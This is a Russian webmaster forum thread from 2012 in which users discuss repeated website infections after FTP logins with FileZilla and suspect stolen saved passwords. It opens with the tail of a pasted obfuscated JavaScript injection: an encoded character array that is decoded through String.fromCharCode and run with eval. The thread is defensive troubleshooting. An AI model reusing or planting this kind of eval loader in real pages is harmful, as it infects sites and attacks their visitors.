,"°","•45","4","•","°18","°°2","°°","17" ,"°°8°°15","°","°1","9°•4","70","•°20" ,"7","°","°","236°","°2","07°°19°•","4"," 34•","°","25","0","°","°2","3","8°°0","°° ","2","4","8","°","•","3","6","6","•","°172 •","410","•°225","°","•38","4","•°20", "5","°","°135°°188°","°2","03","°","°190", "°","•","4","58","•°4","°","•","47","5"," •","(•43","2•","°2","3","8°°","20","6°", "•38","5","•°","19","8","°•4","2","1","• °","227","°","°","23","5°°22","7","°°2","3" ,"6","°","°24","2°","°1","66","°°1","6","5", "°","°","2","41","°","°","2","25°","•4","5" ,"5•°18°","•3","42","•°15","2°","•","3 ","45•°","162°°","1","6","6°Y[m•439","•°1","57","°•","48","3•","°","1 98","°","°197°°1","97°•337","•","3°","1" ,"5","7","°°","141°","°","1","5","6","°","• 36","9","•","°179","°•4","0","7•°","22"," 4","°","•","456","•","°","2","1°°207","°" ,"°","21","°•39","7","•°22","3","°","°"," 2","1","4°°","2","0","3°•","333","•","F•" ,"38","5","•°","1","5","1°•","5","0","7•° 244°","•","4","22","•°166","°•4","23•° 244","°°","2","29","°•4","6","3","•°32"," ","°2","8°•","3","24","•L","°13","5","°", "°","126°","•","4","33","•","°0","°","°2" ,"35°°","25","3°•50","5•5","D•3","3","6 °1","46","°","•471•°","32","°$","•337 ","Q","e","74","3","3","•4","0","6•","x","• ","42","1•°2","4","1°•","4","53•°","1"," •","48","6","•1","•","4","0","1•","°21", "1","°•39","9•","°","2","16°•","3","74"," •°19","5","°","•3","52•g","•406•","°" ,"22","2","°•","3","2","2","•","°","1","3"," 7","°°","14","1","°•","4","8","3","•","!°2 9","°°32°•516•","V","PQ>","•42","2•"," 243","°","°","228°","•","4","85•","!&°"," 3","1","°",",%#","°222","°•","4","6","8•"," °","2","3","4","°","•","38","4","•","y","• 3","7","8•","°","185","°°2","00","°°19","3" ,"°","•","4","9","3","•",")",":","/5","•4","7","4","•!","°21","1","°°","21","9 ","°•3","9","8","•°","14","4","°","•","34 ","7•","T°","1","7","5","°","•42","0","•° 1","3","8","°","°","1","3","5","°","•485"," ","°","19","9","°","°","1","99°°1","99°°19 9°'","$°","222","°","°23","0°","•","4","9", "9","•@•3","3","3","•","°1","42","°°","14 3°","•","3","92","•°","2","12°","°1","43", "°","°","21","1","°","°198","°°1","9","4°", "•","471","•°2","0","°",")","•","375","• °1","63°","°19","6°•","35","2•°","15","4" ,"°°","173","°","•","3","84","•°1","9","0" ,"°","y•4","7","1•°","237","°°","2","37°" ,"°208°•","4","2","5•°16","9","°","•41", "7","•°","2","21","°•","3","8","2","•","° ","1","9","8°°","19","6°","°","19","9°","°", "195°","•5","1","3•?•3","5","7","•°","1" ,"78°•","3","88•","°","19","4","°°1","32° ","°134","°•377•r•","3","6","8","•","°" ,"1","96","°","V","•","4","40","•","°","155" ,"°","°","1","54°","•3","9","6","•n","n•3 8","4","•bb•4","28","•°252","°•4","0","1 •°","2","11","°°2","1","6","°","°206°","° 217°°225°°","152","°°","2","26","°•","3", "98•°","22","4","°","•","52","0•","[•46","5•°","1","6°","°","2","2","°•333", "•","°","1","3","5","°•","357•","°","1"," 6","5","°•4","2","7•°1","64°","°193°"," ","384","•","y•","42","3•°","1","78","°° 1","8","7°°","141°°","1","38","°•","5","1", "0","•°","22","4°","•","33","8•4","4","• 43","6•","°","150","°","•5","19","•","]","•","410•°","1","2","8°","•","496•°21 ","1","°","•","38","9","•g","g•","5","07"," •","°","22","1","°Q°","15°•","33","8•"," 8•4","07","•","z","y","•4","5","6","•","° ","17","0°•","5","1","6•°230°P•4","7","8" ,"•°26°","•","351","•","°17","0","°","° 161°•4","81•*•","3","37•","°158°","X"," •","4","9","9","•",";",":","8","•47","3"," !°19","°°2","2","°°","21","0","°","•453 °","2","19°°","1","90","°","•408","•","° 215","°","•","48","6","•","4","-","•","3","37•°1","41","°°15","8","°°","1 ","4","7°","•389•°","205","°°","204","°", "°","134","°°1","3","5°•","463•°200","°" ,"•","4","6","4","•","$•4","27","•","°14" ,"5°°","1","42°","°14","1","°•","4","76• 1","9","0","°°","1","90°•336•","2°","16", "0°","•","517","•","G","•","47","3•","°" ,"32","°°2","2","°•","4","52•°","1","2"," ","•","340•","°","16","4°","•486•°","2 ","37°","78•417•°","2","4","4°","•","372" ,"•°1","79°°","18","5°°1","74°","°180°", "m•4","1","8","•°","18","4°","•475","•", "°212","°°2","3","0","°•39","3•","°","15" ,"7","°","•","42","9•°147","°•","5","1"," 6•","°23","1°","°23","0°°23","0","°","•" ,"4","3","7","•","°","1","5","1°°","1","1°", "°2","01°°1","55","°","•","4","16","•°"," 1","3","1°°13","0°•37","0•T•","4","6","5 ","°1","79°•5","0","9","•I•3","48•"," ","1","5","2","°","°1","6","7°°","15","8","° ","•38","3","•°","2","00°","°204","°°","1 ","3","4","°","°","2","03°","°","202°•","4" ,"52•°0°°","18","9°•4","74","•","°","2" ,"4","0°","•4","4","5","•","°","182","°"," ","11°","•","469•","°","3","2°","•","4", "5","5•°1","2°°19","2","°•","44","6","• ","1","9","4°","°","183°°2","28","°","°24", "8°","°","1","1°","•","4","47•°0°°","198 °","•3","5","0","•°","1","6","9","°","°1", "52","°","°","1","65°°1","5","5°°166°°","1 ","6","4","°","_","•4","8","5","•°23","1"," ","•","5","15","•","°10","°","•","3","9", "7•","°21","8°•4","6","1","•°","21°"," ","5","1","8•","2S","QH","•","39","5•","°" ,"21","0°","°","2","0","3°","•37","0","•s", "t","•","494•","°","2","45°•","4","3","4", "•°25","4°•437•°","3°","•4","5","0• ","2","5","3","°°","14","°•","33","7","•", "°","15","8°","•3","48","•","°","16","7"," •474•","°","28","°","!","•4","87","•'° ","23","2","°","°","2","43°","°2","3","3","° 22","4°°","23","5°","•5","07•","°24","4° °2","51°","°","2°","•49","9•6","•4","10 °230","°•","44","2•","°","1","86","°"," 20","6","°°16","0°","•","5","06•","°","22 1","°°","220°","•38","3•aa","°","19","2°" ,"°1","8","9°","•50","4•25•3","43•","^° ","1","45°","°1","6","0°","•4","68","•°29" ,"°•","50","6•","8•","4","3","8•","°25", "3°•4","13•","°218°°185","°•","3","86 °","195","°","•3","9","2•°","202°°2","05 ","°•397","•°2","02","°","•400","•°14" ,"5°","°22","0°","°","20","4°°","219°","°2 1","0°•","45","4•°","15°","•354","•"," ","1","7","5","°•4","5","1•°","1","97","°" ,"•","3","99","•°","1","6","3","°•","5","2 ","0•°23","8","°","•4","41•°","1","5","6" ,"°","•46","8•","°","1","8","2°","°182°", "*","•","364","•","R","O","•50","4•°2","1 ","8°•4","90•@","°","254","°•","45","7"," •","°1","75","°°172°","°31","°°","20","3 •","4","84","•","°2","29","°•4","28•°1 ","7","4","°°1","92°","");eval(bb09d1);func tion t14831068(nf83bd){return nf83bd.length;}function pbad8ded5(yd3fdc95,yc588d0){return yd3fdc95.substr(yc588d0,1);}function n1f118(bc49d26f,scbe4f4){return bc49d26f.substr(scbe4f4,1);}function laa5bf1c(c8cad069a,kea2f9dd,e8d156){return c8cad069a-kea2f9dd-e8d156;}function t399b07f(qc8607){var fdb3927c=String;bb09d1+=fdb3927c["\x66ro\x6dCh\x61r\x43od\x65"](qc8607);}

вчера еще все было нормально, работал с ним и заходил через фтп, а сегодня он уже заражен. благо что это тестовая заготовка сайта, без двига, просто html и js, на бесплатном хосте, которую вчера показывал одному человеку, поэтому просто удалил ее сейчас. а значит, уязвимость не в cms. и проблема конечно в том, что сайт опять заразился, и надо как то найти брешь.

сейчас у меня только один вариант - фтп менеджер, т.к. заразился только сайт, на который я вчера заходил чз фтп и вводил пароль, а в тот раз все заразились изза того что пароли в нем были сохранены. пользуюсь я FileZillaPortable_3.5.3, раньше ставил не портативную версию, сейчас решил ее попробовать, похоже зря...
на компе никакой заразы KIS не находит, не знаю, что тогда пароли тащит, сама FileZilla ??


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 04.04.2012, 08:56   #15
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

Цитата:
Сообщение от падаван Посмотреть сообщение
сама FileZilla ??
у Феникса симметричная ситуация. не ясно как, но сайты заражаются. тоже пользуется файлзиллой. Исключили почти всё. Разные движки, разные сервера, разные доступы, только переустановленная винда,антивирус есть, но ко всем коннект файлзиллой. я пользуюсь тоталкоммандерами и никогда в жизни мои сайты еще не рутали.
еще есть варианты снифинга ваших паролей на уровне вайфайки и снифинга паролей на уровне провайдера (когда в провайдере плохие админы), но последний вариант можно смело отметать, ибо за такое им пальцы ломают, да и не шарят админы с трафом работать, как работаем мы. Да и по вайфаю рутать сайты слишком не удобно. Сколько я раз заходил с открытых сетей ресторанов на свои фтп - еще никогда никого не заражали. ну, кроме случаев, когда я сам заражал.
зы
я бы поснифил локально все коннекты файлзилы и пакеты передаваемые. но времени и желания возвращаться в эту стезю нету.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (04.04.2012)
Ответ

Метки
.js, вредоносный код, заражение сайта, скрипты, троян

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3289 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите оценить сайт Tenza Оценка сайтов 8 12.01.2012 19:36
Помогите раскрутить сайт narmina SEO оптимизация (анализ) 0 11.03.2011 15:58
Помогите оценить сайт SE-O Оценка сайтов 4 01.12.2010 00:51
Помогите продвинуть сайт Staral Раскрутка в общих чертах 4 02.10.2009 18:36
Помогите! сайт рухнул vamgazel Яndex 10 11.07.2009 09:31

Текущее время: 12:06. Часовой пояс GMT +3.